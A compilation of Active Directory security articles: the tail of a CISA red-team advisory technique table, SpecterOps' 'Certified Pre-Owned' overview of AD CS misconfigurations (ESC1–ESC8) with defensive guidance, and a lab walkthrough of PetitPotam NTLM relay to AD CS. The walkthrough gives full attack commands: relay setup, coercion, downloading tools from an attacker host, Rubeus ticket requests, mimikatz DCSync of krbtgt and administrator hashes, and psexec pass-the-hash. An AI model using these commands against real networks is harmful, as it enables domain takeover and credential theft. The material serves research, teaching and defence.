System Owner/User DiscoveryT1033During Phase II, the team enumerated the AD for current session information from every domain computer (Workstation and Server).
 Lateral Movement 
Technique TitleIDUse
Remote Services: SMB/Windows Admin SharesT1021.002The team moved laterally with an SMB beacon.During Phase II, they used compromised workstation and domain admin accounts to upload a payload via SMB on several target Workstations and the DC.
Use Alternate Authentication Material: Pass the HashT1550.002The team ran the DFSCoerce python script, which prompted DC authentication to a server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Pass the TicketT1550.003The team used the asktgt command to impersonate accounts for which they had credentials by requesting account TGTs.
 Command and Control 
Technique TitleIDUse
Application Layer ProtocolT1071The team remotely enumerated the local administrators group on target hosts to find valid user accounts. This technique relies on anonymous SMB pipe binds, which are disabled by default starting with Server 2016.During Phase II, the team established sessions that originated from a target Workstation and from the DC directly to an external host over a clear text protocol.
Application Layer Protocol: Web ProtocolsT1071.001The team’s C2 redirectors used HTTPS reverse proxies to redirect C2 traffic.
Application Layer Protocol: File Transfer ProtocolsT1071.002The team used HTTPS reverse proxies to redirect C2 traffic between target network and the team’s Cobalt Strike servers.
Encrypted ChannelT1573The team’s C2 traffic was encrypted in transit using encryption keys stored on their C2 servers.
Ingress Tool TransferT1105During Phase II, the team uploaded and executed well-known malicious files to the DC to generate host-based alerts.
Proxy: External ProxyT1090.002The team used redirectors to redirect C2 traffic between the target organization’s network and the team’s C2 servers.
Proxy: Domain FrontingT1090.004The team used domain fronting to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating.
 Impact 
Technique TitleIDUse
Account Access RemovalT1531During Phase II, the team locked out several administrative AD accounts.

Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we’d welcome your feedback.

Source :
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a

Certified Pre-Owned

Will Schroeder
Researcher @SpecterOps . Coding towards chaotic good while living on the decision boundary.

Published in Posts By SpecterOps Team Members
22 min read
Jun 17, 2021

TL;DR Active Directory Certificate Services has a lot of attack potential! Check out our whitepaper “Certified Pre-Owned: Abusing Active Directory Certificate Services” for complete details. We’re also presenting this material at Black Hat USA 2021.

[EDIT 06/22/21] — We’ve updated some of the details for ESC1 and ESC2 in this post which will be shortly updated in the whitepaper.

For the past several months, we (Will Schroeder and Lee Christensen) have been diving into the security of Active Directory Certificate Services (AD CS). While several aspects of Active Directory have received thorough attention from a security perspective, Active Directory Certificate Services has been relatively overlooked. AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more. While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous.

Today we’re releasing the results of our research so far (there is still much to look at, and we know we have missed things) in the form of an extensive whitepaper and a defensive PowerShell toolkit for auditing these issues. The toolkit is heavily defensive focused, but we will also release two offensive tools in ~45 days at Black Hat, as we believe that the issues described in the paper are severe and widespread enough to warrant a delay in the offensive tool release. The whitepaper also contains substantial preventative and detective guidance.

AD CS and its security implications are complicated, and we highly recommend reading the whitepaper for complete context. This post is a brief summary of the paper, and we will release a number of additional posts in the coming weeks and months to highlight elements of the research.

So why care about this? Certificate abuse can grant an attacker:

Of note, nearly every environment with AD CS that we’ve examined for domain escalation misconfigurations has been vulnerable. It’s hard for us to overstate what a big deal these issues are.

Sidenote: because of the number of attacks we ended up documenting in this research, we have tagged each attack with an ID (e.g., ESC2) as well as each defense (e.g., DETECT3). This is for ease of mapping of attacks to appropriate defenses in the whitepaper.

Active Directory Certificate Services Crash Course

Common Terms and Acronyms

There are a lot of terms and acronyms we’re going to be using throughout this post (and paper), so here’s a quick breakdown of a few for reference:

  • PKI (Public Key Infrastructure) — a system to manage certificates/public key encryption
  • AD CS (Active Directory Certificate Services) — Microsoft’s PKI implementation
  • CA (Certificate Authority) — PKI server that issues certificates
  • Enterprise CA — CA integrated with AD (as opposed to a standalone CA), offers certificate templates
  • Certificate Template — a collection of settings and policies that defines the contents of a certificate issued by an enterprise CA
  • CSR (Certificate Signing Request) — a message sent to a CA to request a signed certificate
  • EKU (Extended/Enhanced Key Usage) — one or more object identifiers (OIDs) that define how a certificate can be used

Overview

AD CS is a server role that functions as Microsoft’s public key infrastructure PKI implementation. As expected, it integrates tightly with Active Directory and enables the issuing of certificates, which are X.509-formatted digitally signed electronic documents that can be used for encryption, message signing, and/or authentication (our research focus).

The information included in a certificate binds an identity (the subject) to a public/private key pair. An application can then use the key pair in operations as proof of the identity of the user. Certificate Authorities (CAs) are responsible for issuing certificates.

At a high level, clients generate a public-private key pair, and the public key is placed in a certificate signing request (CSR) message along with other details such as the subject of the certificate and the certificate template name. Clients then send the CSR to the Enterprise CA server. The CA server then checks if the client is allowed to request certificates. If so, it determines if it will issue a certificate by looking up the certificate template AD object (more on these shortly) specified in the CSR. The CA will check if the certificate template AD object’s permissions allow the authenticating account to obtain a certificate. If so, the CA generates a certificate using the “blueprint” settings defined by the certificate template (e.g., EKUs, cryptography settings, issuance requirements, etc.) and using the other information supplied in the CSR if allowed by the certificate’s template settings. The CA signs the certificate using its private key and then returns it to the client.

That’s a lot of text. So here’s a graphic:

Certificate Templates

AD CS Enterprise CAs issue certificates with settings defined by AD objects known as certificate templates. These templates are collections of enrollment policies and predefined certificate settings and contain things like “How long is this certificate valid for?”, “What is the certificate used for?”, “How is the subject specified?”, “Who is allowed to request a certificate?”, and a myriad of other settings:

The pKIExtendedKeyUsage attribute on an AD certificate template object contains an array of object identifiers (OIDs) enabled for the template. These EKU object identifiers affect what the certificate can be used for (PKI Solutions has a breakdown of the EKU OIDs available from Microsoft). Our research focused on EKUs that, when present in a certificate, permit authentication to Active Directory. We originally thought that only the “Client Authentication“ OID (1.3.6.1.5.5.7.3.2) enabled this; however, our research also found that the following OID scenarios can enable certificate-based authentication:

*The 1.3.6.1.5.2.3.4 OID is not present in AD CS deployments by default and needs to be added manually, but it does work for client authentication.

Templates also have a number of other interesting settings which we explore in depth in the whitepaper. The paper also covers template “Issuance Requirements” which can function as preventative controls, which we will briefly touch on in this post.

Subject Alternative Names

A Subject Alternative Name (SAN) is an extension that allows additional identities to be bound to a certificate beyond just the subject of the certificate. For example, if a web server hosts content for multiple domains, each applicable domain could be included in the SAN so that the web server only needs a single HTTPS certificate instead of one for each domain.

This is all well and good for HTTPS certificates, but when combined with certificates that allow domain authentication, a dangerous scenario can arise. By default during certificate-based authentication, certificates are mapped to Active Directory accounts based on a user principal name (UPN) specified in the SAN. So, if an attacker can specify an arbitrary SAN when requesting a certificate that enables domain authentication, and the CA creates and signs a certificate using the attacker-supplied SAN, the attacker can become any user in the domain! Domain escalation scenarios can result from various AD CS template misconfigurations that allow unprivileged users to supply an arbitrary SAN in a certificate enrollment. We’ll cover these situations in the Domain Escalation section.

Active Directory Authentication with Certificates

Last year, @_ethicalchaos_ made a PR to Rubeus to implement PKINIT abuse, and covers more details on this in depth in their post on attacking smart card based Active Directory networks. This was a missing link for us offensively, and means that we can now use Rubeus to request a Kerberos ticket granting ticket (TGT) using a certificate enabled for domain authentication:

That’s right, we don’t need a physical smart card or the Windows Credential Store to perform this certificate-based Kerberos authentication! Benjamin Delpy’s (@gentilkiwiKekeo has supported this for years, but the Rubeus implementation made it more readily usable for our operations.

During our research, we also found that some protocols use Schannel — the security package backing SSL/TLS — to authenticate domain users. LDAPS is a commonly enabled use case. For example, the following screenshot shows the PowerShell script Get-LdapCurrentUser authenticating to LDAPS using a certificate for authentication and performing an LDAP whoami to see what account authenticated:

Account Persistence

If an Enterprise CA exists, a user (or machine) can request a cert for any template available to them for enrollment. The whitepaper covers theft of existing certificates, but we’re only going to touch on “active” malicious enrollments here. Our goal, in the context of user credential theft, is to request a certificate for a template that allows us to authenticate to Active Directory as that user (or machine). For complete details, see the “Account Persistence” section in the whitepaper.

The Certify.exe find /clientauth command will query LDAP for available templates that we can examine for our desired criteria:

This can also be done via PSPKIAudit with Get-AuditCertificateTemplate | ?{$_.HasAuthenticationEku}

If we have GUI access to a host, we can manually request a certificate through certmgr.msc. Alternatively, Certify (or certreq.exe) can be used be used for these malicious enrollments:

These issued certificates can then be used with Rubeus to authenticate to Active Directory as this user, for as long as the certificate is valid. This is an alternative method of long-term credential theft that doesn’t touch LSASS and can be performed from a non-elevated context!

This also works for machine certificates, which can be combined with S4U2Self to obtain a Kerberos service ticket to any service on the host (e.g., CIFS, HTTP, RPCSS, etc.) as any user. Elad Shamir’s excellent post about Kerberos delegation attacks details this attack scenario.

And since certificates are independent authentication material, these certificates will still be usable even if the user (or computer) resets their password!

Domain Escalation

While there isn’t anything necessarily inherently insecure about AD CS (except for ESC8 as detailed below), it is surprisingly easy to misconfigure its various elements, resulting in ways for unelevated users to escalate in the domain. We’ll briefly cover the main sets of misconfigurations, but again, see the whitepaper for complete details.

Misconfigured Certificate Templates — ESC1

In order to abuse this misconfiguration, the following conditions must be met:

  1. The Enterprise CA grants low-privileged users enrollment rights. The Enterprise CA’s configuration must permit low-privileged users the ability to request certificates. See the “Background — Certificate Enrollment” in the whitepaper paper for more details.
  2. Manager approval is disabled. This setting necessitates that a user with certificate manager permissions review and approve the requested certificate before the certificate is issued. See the “Background — Certificate Enrollment — Issuance Requirements’ section in the whitepaper paper for more details.
  3. No authorized signatures are required. This setting requires any CSR to be signed by an existing authorized certificate. See the “Background — Certificate Enrollment — Issuance Requirements” section in the whitepaper for more details.
  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Having certificate enrollment rights allows a low-privileged attacker to request and obtain a certificate based on the template. Enrollment rights are granted via the certificate template AD object’s security descriptor.
  5. The certificate template defines EKUs that enable authentication. Applicable EKUs include Client Authentication (OID 1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (1.3.6.1.5.2.3.4), Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2), Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA).
  6. The certificate template allows requesters to specify a subjectAltName (SAN) in the CSR. If a requester can specify the SAN in a CSR, the requester can request a certificate as anyone (e.g., a domain admin user). The certificate template’s AD object specifies if the requester can specify the SAN in its mspki-certificate-name-flag property. The mspki-certificate-name-flag property is a bitmask and if the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is present, a requester can specify the SAN. This is surfaced as the “Supply in request” option in the “Subject Name” tab in certtmpl.msc.

Misconfigured Certificate Templates — ESC2

In order to abuse this misconfiguration, the following conditions must be met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.
  2. Manager approval is disabled. Details are the same as in ESC1.
  3. No authorized signatures are required. Details are the same as in ESC1.
  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.
  5. The certificate template defines Any Purpose EKUs or no EKU.

[EDIT 06/22/21]

While templates with these EKUs can’t be used to request authentication certificates as other users without the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag being present (i.e., ESC1), an attacker can use them to authenticate to AD as the user who requested them and these two EKUs are certainly dangerous on their own.

We were initially a bit unclear about the capabilities of the Any Purpose and subordinate CA (SubCA) EKUs, but others reached out and helped us clarify our understanding. An attacker can use a certificate with the Any Purpose EKU for (surprise!) any purpose — client authentication, server authentication, code signing, etc. In contrast, an attacker can use a certificate with no EKUs — a subordinate CA certificate — for any purpose as well but could also use it to sign new certificates. As such, using a subordinate CA certificate, an attacker could specify arbitrary EKUs or fields in the new certificates.

HOWEVER, if the subordinate CA is not trusted by the NTAuthCertificates object (which it won’t be by default), the attacker cannot create new certificates that will work for domain authentication. Still, the attacker can create new certificates with any EKU and arbitrary certificate values, of which there’s plenty the attacker could potentially abuse (e.g., code signing, server authentication, etc.) and might have large implications for other applications in the network like SAML, AD FS, or IPSec.

We feel confident in stating that it’s very bad if an attacker can obtain an Any Purpose or subordinate CA (SubCA) certificate, regardless of whether it’s trusted by NTAuthCertificates or not.

[/EDIT]

Enrollment Agent Templates — ESC3

In order to abuse this misconfiguration, the following conditions must be met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.
  2. Manager approval is disabled. Details are the same as in ESC1.
  3. No authorized signatures are required. Details are the same as in ESC1.
  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.
  5. The certificate template defines the Certificate Request Agent EKU. The Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) allows for requesting other certificate templates on behalf of other principals.
  6. Enrollment agent restrictions are not implemented on the CA.

The Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1), known as “Enrollment Agent” in Microsoft documentationallows a principal to enroll for a certificate on behalf of another user. For anyone who enrolls in such a template, the resulting certificate can be used to co-sign requests on behalf of any user, for any Schema Version 1 template or any Schema Version 2+ template that requires the appropriate “Authorized Signatures/Application Policy” Issuance Requirement. This also assumes that there are no limiting Enrollment Agent Restrictions on the CA.

The few sentences before this throwback meme might need a bit of clarification. If an attacker is able to enroll in a template with a “Certificate Request Agent” EKU, they can enroll on behalf of any user for any Version 1 certificate template, or any Version 2+ template configured to explicitly require this co-signing scenario. Schema Version 1 templates don’t implement this type of Issuance Requirement, so all are on the table. Specifically, the User and Machine/Computer templates are prime targets as they contain the Client Authentication EKU and are published by default (though this can be changed), and there are other Version 1 templates that can be vulnerable if published.

If a Version 1 template is duplicated for modification, it automatically becomes Schema Version 2 by default, meaning a “Certificate Request Agent” template will NOT work unless such an issuance requirement is explicitly specified.

A bit confusing? We know. We do our best to break this down in more depth in the whitepaper, but it’s a complex set of interwoven restrictions.

Vulnerable Certificate Template Access Control — ESC4

Certificate templates are securable objects in Active Directory, meaning they have a security descriptor that specifies which Active Directory principals have specific permissions over the template. For more background on Active Directory ACLs, see our (other) whitepaper on the subject.

We say that a template is misconfigured at the access control level if it has Access Control Entries (ACEs) that allow unintended, or otherwise unprivileged, Active Directory principals to edit sensitive security settings in the template. That is, if an attacker is able to chain access to a point that they can actively push a misconfiguration to a template that is not otherwise vulnerable (e.g., by enabling the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit in the mspki-certificate-name-flag property for a template that allows for domain authentication), we end up with domain compromise scenarios similar to what we’ve already covered. An example of this we have seen in multiple environments is Domain Computers having FullControl or WriteDacl permissions over a certificate template’s AD object, allowing attackers with access to any AD computer modify the certificate template to a dangerous state. This is a scenario explored in Christoph Falta’s GitHub repo.

Vulnerable PKI Object Access Control — ESC5

We won’t touch on this one as heavily here, but a number of objects outside of certificate templates and the certificate authority itself can have a security impact on the entire AD CS system.

These possibilities include (but are not limited to):

  • CA server’s AD computer object (i.e., compromise through RBCD)
  • The CA server’s RPC/DCOM server
  • Any descendant AD object or container in the container CN=Public Key Services,CN=Services,CN=Configuration,DC=<COMPANY>,DC=<COM> (e.g., the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, the Enrollment Services container, etc.)

EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

Another way to supply arbitrary SANs, described in a CQure Academy post, involves the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. As Microsoft describes, “If this flag is set on the CA, any request (including when the subject is built from Active Directory®) can have user defined values in the subject alternative name.” This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine). As this Keyfactor post describes, this setting “just makes it work”, which is why it’s likely flipped in many environments by sysadmins who don’t fully understand the security implications.

Our normal reaction to seeing this setting in enterprise environments:

Vulnerable Certificate Authority Access Control — ESC7

Outside of certificate templates, a certificate authority itself has permissions (accessible through certsrv.msc) that secure various CA actions. From a security perspective we care about the ManageCA (aka “CA Administrator”) and ManageCertificates (aka “Certificate Manager/Officer”) permissions.

The ManageCA permission grants a principal the ability to perform “Administrative” CA actions, including the modification of persistent configuration data. This includes the EDITF_ATTRIBUTESUBJECTALTNAME2 flag, allowing any principal with the ManageCA permission to fixate ESC6. This can be done with PSPKI’s Enable-PolicyModuleFlag cmdlet.

The ManageCertificates permission allows the principal to approve pending certificate requests, negating the “Manager Approval” Issuance Requirement/protection. So while it can’t be used on its own to compromise the domain, it can function as a protection bypass.

NTLM Relay to AD CS HTTP Endpoints — ESC8

We cover this in more detail in the “Background — Certificate Enrollment” section of the whitepaper, but AD CS supports several HTTP-based enrollment methods via additional server roles that administrators can optionally install:

These HTTP-based certificate enrollment interfaces are all vulnerable to NTLM relay attacks. Using NTLM relay, an attacker can impersonate an inbound-NTLM-authenticating victim user. While impersonating the victim user, an attacker could access these web interfaces and request a client authentication certificate based on the User or Machine certificate templates.

This attack, like all NTLM relay attacks, requires a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, but a simple technique is to coerce a machine account to authenticate to the attacker’s host using the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) methods using a tool like SpoolSample or Dementor. The attacker can then use NTLM relay to impersonate the machine account and request a client authentication certificate (e.g., the default Machine/Computer template) as the victim machine account. If the victim machine account can perform privileged actions such as domain replication (e.g., domain controllers or Exchange servers), the attacker could use this certificate to compromise the domain. Otherwise, the attacker could logon as the victim machine account and use S4U2Self as previously described to access the victim machine’s host OS.

  • Note: Newer OS’es have patched the MS-RPRN coerced authentication “feature”. However, almost every environment we examine still has Server 2016 machines running, which are still vulnerable to this. There are other ways to coerce accounts to authenticate to an attacker as well.

In summary, if an environment has AD CS installed, along with a vulnerable web enrollment endpoint and at least one certificate template published that allows for domain computer enrollment and client authentication (like the default Machine/Computer template), then an attacker can compromise ANY computer with the spooler service running!

These attack scenarios work because some enrollment HTTP endpoints do not have HTTPS enabled and none of them have any NTLM relay protections enabled by default. Organizations should disable these HTTP-based enrollment server roles if they are not in use. Otherwise, network defenders can disable NTLM authentication using GPOs or configuring the associated IIS applications to only accept Kerberos authentication. If organizations cannot remove the endpoints or outright disable NTLM authentication, they should only allow HTTPS traffic and configure the IIS applications to Extended Protection for Authentication .

This specific issue was reported to MSRC, along with the other template escalation misconfigurations. The official response was, “We determined your finding is valid but does not meet our bar for a security update release.

Note: While we have verified that this attack is possible, we are waiting to publicly demonstrate it at our Black Hat talk to help facilitate fixing the issue first.

Domain Persistence

Active Directory Enterprise CAs are hooked into the authentication system of AD and the CA root certificate private key is used to sign newly issued certificates. If we stole this private key, would we be able to forge our own certificates that could be used (without a smart card) to authenticate to Active Directory as anyone in the organization?

Spoiler: yes. And this has already been possible with Mimikatz/Kekeo for years. I guess we should call these golden certificates?

The certificate exists on the CA server itself, with its private key protected by machine DPAPI if a TPM/HSM is not used for hardware-based protection. If the key is not hardware protected, Mimikatz and SharpDPAPI can extract the CA certificate and private key from the CA:

With this key, you can create and sign new certificates for ANY user and use these forged certificates to authenticate to AD for as long as the CA cert is valid (default of 5 years, but often longer). Our tool ForgeCert (which will be released at Black Hat USA 2021 along with Certify) can perform these forgeries:

Oh, and these certs can’t be revoked, since they were never actually issued by the CA itself, as detailed by Benjamin Delpy:

Unfortunately, there isn’t a huge amount of public incident response guidance as far as AD CS. But if a root CA’s key is stolen, the entire AD CS system will likely need to be rebuilt, invalidating every issued certificate.

Defensive Advice

Not only are we self-embargoing the offensive tool release for these abuses, but we’ve also spent a large amount of effort researching both preventative and detective controls for these attacks. Part of the motivation for breaking out attacks and associated defensive protections with individual identifiers was to make the whitepaper material as digestible as possible for defenders.

Besides identifying and mitigating the privilege escalation vulnerabilities, something we want to emphasize from an incident response perspective is that it is not enough to reset a compromised user’s password and/or reimage their machine. Certificate theft is trivial in most environments given code execution in a user or computer context and would allow an attacker to authenticate to AD for years — even after the account’s password has been reset. Therefore, when an account or machine is compromised, incident responders should identify and invalidate any certificates associated with the compromised accounts as well. PSPKIAudit’s Get-CertRequest can help perform this type of triage.

As the defenses for these attacks are multi-pronged, at this point we’re recommending defenders study the attacks, read the extensive “Defensive Guidance” section of the whitepaper, and reference Microsoft’s Securing PKI documentation. Defenders can also try out the PSPKIAudit’s Invoke-PKIAudit function the misconfigurations described in this post:

Wrap-up

Even months into this research, we believed that there wasn’t necessarily anything inherently insecure about Active Directory Certificate Services. While the entire system is very dangerous if an organization doesn’t fully understand AD CS or its security implications (as it’s extremely easy to misconfigure) there didn’t appear to be any “out of the box” vulnerabilities. That said, we have seen a proliferation of the ESC1–7 elevation issues in real environments since we began looking in January 2021. We feel administrators have been given a powerful weapon with the safety off for 20 years and there’s been little safety training. An attitude of, “Well, admins should have known better” in this scenario, without even providing a way to audit or investigate these issues programmatically from a defensive context, is, well, a position we suppose.

However, beyond the template misconfiguration scenarios, the ESC8 relay situation is a serious security issue. We reported this relay issue to MSRC on May 19th along with all domain escalation scenarios, and received a response on June 8th of “We determined your finding is valid but does not meet our bar for a security update release. We considered that servers with AD CS roles could mitigate this risk with a change in configuration settings to enable Extended Protection for Authentication (EPA), per this blog post.” MSRC stated that they also opened up a bug concerning the template issues and our comments about poor telemetry with the AD CS feature team, who may consider additional design changes in a future release.

To be clear, based on our research, if you are running AD CS with ANY template a domain computer can enroll in that also allows domain authentication (e.g., the Machine/Computer template that is available by default), ANY system running the spooler service can be compromised. Based on our extensive experience assessing AD environments, we believe this is very bad. If you find you are vulnerable to this, consider contacting your nearest Microsoft representative and question them as to why this insecure default configuration is allowed. As of right now, they have no intentions of directly servicing the issue, but said they may fix it at some indeterminate future date.

From a defensive perspective, you should either immediately enumerate the Web Enrollment interfaces enabled in your environment (possible with PSPKIAudit) and then either remove them, disable NTLM authentication to them, or enforce HTTPS to them and enable EPA on the IIS server component. For specifics on how to do this, please see “Defensive Guidance — Harden AD CS HTTP Endpoints — PREVENT8” in the whitepaper. We also strongly recommend organizations audit their AD CS architecture and certificate templates and treat CA servers (including subordinate CAs) as Tier 0 assets with the same protections as Domain Controllers! The “Defensive Guidance” section of the whitepaper has more information on how to proactively prevent, detect, and respond to the attacks we’ve detailed.

Yes, we’re working to integrate the escalation paths into BloodHound, but as you can see this whole thing is rather complicated, and we want to get it right. But rest assured, it’s currently under development at the moment and will be released in FOSS BloodHound.

And finally, as a disclaimer, we are not stating that we know every security issue concerning AD CS. We took our best shot in this research, but we are confident that there are additional issues and attacker tradecraft implications that we (or others) will find in the coming months, or things we have missed.

Acknowledgements

As is almost always the case, we’re standing on a number of shoulders with this research. The whitepaper gives a more complete treatment of prior work, but as a summary:

Special thanks to Mark Gamache for collaborating with us on parts of this work. He independently discovered many of these abuses, reached out to us, and brought many additional details to our attention while we were performing this research.

As always, we tried our best to cite the existing work out there that we came across, but we’re sure we missed things.

Source :

https://posts.specterops.io/certified-pre-owned-d95910965cd2

Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints

February 25, 2022
By Raj Chandel

Introduction

Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research paper, they talked about an inherent vulnerability in the web interface of CA server with web enrolment service on. An attacker can, therefore, relay the requests from the web interface to request the Domain Controller machine account’s (DC$) certificate and gain escalation+persistence. PetitPotam is one such PoC tool developed by Lionel Gilles (found here) that can coerce or persuade a windows host to authenticate against DC which can be used to request certificates and gain escalation.

 Table of content

  • Vulnerability
  • Architecture
  • Lab Setup
  • Attack Demonstration
  • Initial Compromise
  • Certificate Generation – PetitPotam Python script
  • Certificate Generation – PetitPotam.exe
  • Certificate Generation – Mimikatz
  • Privilege Escalation
    • TGT generation
    • DCSync attack
    • PassTheHash attack
  • Mitigation
  • Conclusion

 Vulnerability

AD CS supports several HTTP-based enrollment methods via additional AD CS server roles that administrators can install. These enrolment interfaces are vulnerable to NTLM relay attacks. The web endpoints do not have NTLM relay protections enabled by default and hence, are vulnerable by default. Flow of the vulnerability is as follows:

  • The attack coerces/forces a Domain Controller Machine Account (workstation01$ in our case) to authenticate towards our NTLM relay setup (Kali in our case).
  • Workstation01$ account authentication request is forwarded to NTLM relay server (kali).
  • Workstation01$ account authentication relayed to CA Server or ADCS (Active Directory Certificate Service).
  • Generate Certificate
  • Use the certificate to perform attacks (like DCSync) to compromise DC1$ (CA server)

How do we force authentication? => If an attacker is patient, he can wait for organic authentication. But we don’t have that much time so we need to force authentication. One such method is the famous “Printer Bug.” But it depends on the print spooler service to be running and vulnerable. Therefore, Lionel Gilles created “PetitPotam” which initially leveraged the vulnerable EfsRpcOpenFileRaw function in MS-EFSR protocol that had an insufficient path check vulnerability. By using this, attackers can make forced/coerced authentications over SMB thus increasing NTLM relay’s capabilities. Since then, many newer functions have been added to the PetitPotam tool.

Architecture

CA server with Web Enrollment – DC1$: 192.168.1.2

Domain Controller – workstation01$: 192.168.1.3

Attacker Kali – Not in domain: 192.168.1.4

Attacker Windows – Not in domain: random IP (non-domain joined but DNS pointing to CA IP)

Lab Setup

On the Windows Server where ADCS is already configured, go to the server manager and choose to add roles and features and add the following three roles:

  • CA Web Enrolment
  • Certificate Enrolment Web Service
  • Network Device Enrolment Service

As you can see, on my server (dc1.ignite.local) I have already installed these. I didn’t change any configuration and kept everything to default.

We can start internet explorer and see on the following link if cert web enrolment is running or not.

http://dc1.ignite.local/certsrv/

And finally, you need to set up a separate DC account on a different machine as I have. In most of the scenarios, DC and CA servers are the same but just for the sake of simplicity, I have made them different. As you can see the DC machine has a DC account set up called “Workstation01” which is in the DC group.

Attack Demonstration

The demonstration is divided into 5 parts: Initial compromise, 3 methods to request CA, and Escalation.

Initial Compromise

Since this is a domain escalation attack, we first need access to the victim system. Here, I have compromised a computer that has a workstation01$ account on it. It is clear that this system has a DC machine account on it which means the system belongs to a DC but we do not have access to DC.

net group “domain controllers” /domain

Our aim: generate DC certificate and authenticate CA server against it and escalate privileges to DC.

Compromised Credentials: Harshit:Password@1

Before we generate a certificate for this DC account, we need to set up our NTLM relay. We can do this using Impacket’s python script ntlmrelayx.py

ntlmrelayx.py -t http://192.168.1.2/certsrv/certfnsh.asp -smb2support –adcs –template DomainController

Certificate Generation – PetitPotam Python script

PetitPotam can be downloaded from the official github repo here. To run the script is quite easy, you just need to specify the domain, credentials of the compromised user and IP of NTLM relayer (kali) followed by IP of the DC

git clone https://github.com/topotam/PetitPotam

cd PetitPotam

python3 PetitPotam.py -d ignite.local -u harshit -p Password@1 192.168.1.4 192.168.1.3

If everything goes well, you would see a screenshot like above with the script stating Sending EfsRpcOpenFileRaw and Attack Successful!

This should have generated the certificate for DC machine account Workstation01$ in the NTLM relay console. A few things to observe here are:

  • Authentication succeeded: means that Cert Web Enrol has been called for a machine account (vulnerability in the Windows API for web enrolment) by providing authentication for a low priv user.
  • Attack from 192.168.1.3 controlled, attacking target 192.168.1.2: means that the relay has now successfully forwarded the request to CA server and a certificate be generated for the DC account workstation01$

You can copy this certificate in a text file.

Before we move on to the actual priv ESC methods, I’d like to show you two more methods to do the same as what we did just now.

Certificate Generation – PetitPotam.exe

The official GitHub repo also comes with the PetitPotam.exe file. You can upload this file to the victim server and execute and get the same results. If you see a slight pause and then Attack success!!! Status, you have generated the DC account’s certificate. In the PetitPotam.exe command, “1” refers to the triggering of the exploit using default EfsRpcOpenFileRaw function vulnerability. There are other vulnerable functions added by the author too.

powershell wget 192.168.1.4/PetitPotam.exe -O PetitPotam.exe

PetitPotam.exe 192.168.1.4 192.168.1.3 1

Certificate Generation – Mimikatz

As people of culture, we like to add new exploits to our favourite mimikatz. EfsRpcOpenFileRaw function vulnerability can be triggered using mimikatz too. We just need to upload this to our victim’s server and execute the following command.

/connect: NTLM relay IP

/server: dc_account.domain.fqdn

powershell wget http://192.168.1.4/mimikatz.exe -O mimikatz.exe

misc::efs /server:workstation01.ignite.local /connect:192.168.1.4

All of the above methods shall yield the same certificate as result. Now, let’s escalate our privileges.

Privilege Escalation

TGT generation

We need to take a new Windows 10 system that is not in the domain to demonstrate this practical. We set up a local admin account on this system and change our DNS to point to the DC like so:

Now, since we have our DC certificate with us, we need to translate this into much more efficient means of access. Let’s generate a TGT using Rubeus first. Asktgt module in Rubeus can do that while taking the generated certificate as a command-line input. The command is as follows:

.\Rubeus.exe asktgt /outfile:kirbi /dc:192.168.1.2 /domain:ignite.local /user:workstation01 /ptt /certificate:MIIRdQIBAz…..

Kirbi is a base64 encoded TGT format used by Rubeus.

As you can see with the klist command, a TGT has been created and saved in the system for further use.

DCSync Attack

Using mimikatz, we can leverage this ticket to conduct DCSync attack. First, let’s dump the krbtgt account’s hashes.

lsadump::dcsync /domain:ignite.local /user:krbtgt

Now, an attacker can use these credentials and SID provided to perform a Golden Ticket attack (for persistence). Details can be found here. But we are concerned with CA Server’s (DC1$ machine account) admin access at the moment. Let’s run DCSync one more time on the administrator account.

lsadump::dcsync /domain:ignite.local /user:administrator

As you can see, we have now obtained the NTLM hash of the Administrator account. Let us use psexec to gain a healthy shell now by conducting a PassTheHash attack.

PassTheHash Attack

To conduct PassTheHash, we will use Impacket’s psexec.py implementation and the following command:

psexec.py -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/administrator@192.168.1.2

And voila! That’s it. You can see that we have now compromised CA Server’s DC account (DC1$) just by leveraging the ADCS web enrolment vulnerability and creds of a low priv user.

Mitigation

Microsoft has rolled out a detailed advisory on the necessary patching mechanism which can be found here. But I’ll sum it up in short sentences here:

  • Enable require SSL in the IIS manager->default sites->certsrv option
  • Enable extended protection (under certsrv->authentication)
  • Disable NTLM for IIS on ADCS server by setting certsrv->providers->negotiate:kerberos

 Conclusion

Certified-Pre Owned is a valuable white paper focusing on various ADCS vulnerabilities and through the means of our blog, we aim to create awareness about these attacks so that organisations can understand, implement and patch such unknown and unobserved weaknesses. Hope you liked the article. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here

Source :
https://www.hackingarticles.in/domain-escalation-petitpotam-ntlm-relay-to-adcs-endpoints/

NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations

Release Date October 05, 2023
Alert CodeAA23-278A

